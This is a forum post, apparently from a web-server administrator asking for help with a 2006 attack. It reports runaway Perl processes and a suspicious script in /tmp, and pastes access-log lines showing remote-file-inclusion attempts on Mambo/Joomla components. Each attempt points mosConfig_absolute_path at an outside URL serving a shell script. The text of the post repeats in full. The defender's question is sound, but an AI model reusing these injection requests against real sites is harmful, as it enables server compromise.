Hi!
The past 2 days I have had many, many Perl processes running.
When I can get in to the server load is between 100-150.
So to be able to work I kill all perl processes.
I thing it''s a php script being used to run a off site script.
My mod_Security seems to block a lot of stuff regarding similar stuff so I wonder if it
is possible that mod_Securtiy will fail if the server being attacked ?
What is the libwww-perl/5.805" at the end of the log below ?
It changes version number - like it's trying to find something....
I found a script in /tmp today, was not there yesterday, but could not see it
since my virus program stoped me from reading it.
72.9.239.178 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
81.17.45.171 - - [22/Sep/2006:12:03:02 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.69"
193.198.217.3 - - [22/Sep/2006:12:03:24 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
66.36.233.10 - - [22/Sep/2006:12:03:28 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
62.199.234.50 - - [22/Sep/2006:12:03:29 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
70.85.88.196 - - [22/Sep/2006:12:03:43 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
66.148.74.139 - - [22/Sep/2006:12:04:02 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.79"
The past 2 days I have had many, many Perl processes running.
When I can get in to the server load is between 100-150.
So to be able to work I kill all perl processes.
I thing it''s a php script being used to run a off site script.
My mod_Security seems to block a lot of stuff regarding similar stuff so I wonder if it
is possible that mod_Securtiy will fail if the server being attacked ?
What is the libwww-perl/5.805" at the end of the log below ?
It changes version number - like it's trying to find something....
I found a script in /tmp today, was not there yesterday, but could not see it
since my virus program stoped me from reading it.
72.9.239.178 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
81.17.45.171 - - [22/Sep/2006:12:03:02 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.69"
193.198.217.3 - - [22/Sep/2006:12:03:24 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
66.36.233.10 - - [22/Sep/2006:12:03:28 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
62.199.234.50 - - [22/Sep/2006:12:03:29 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
70.85.88.196 - - [22/Sep/2006:12:03:43 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
66.148.74.139 - - [22/Sep/2006:12:04:02 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.79"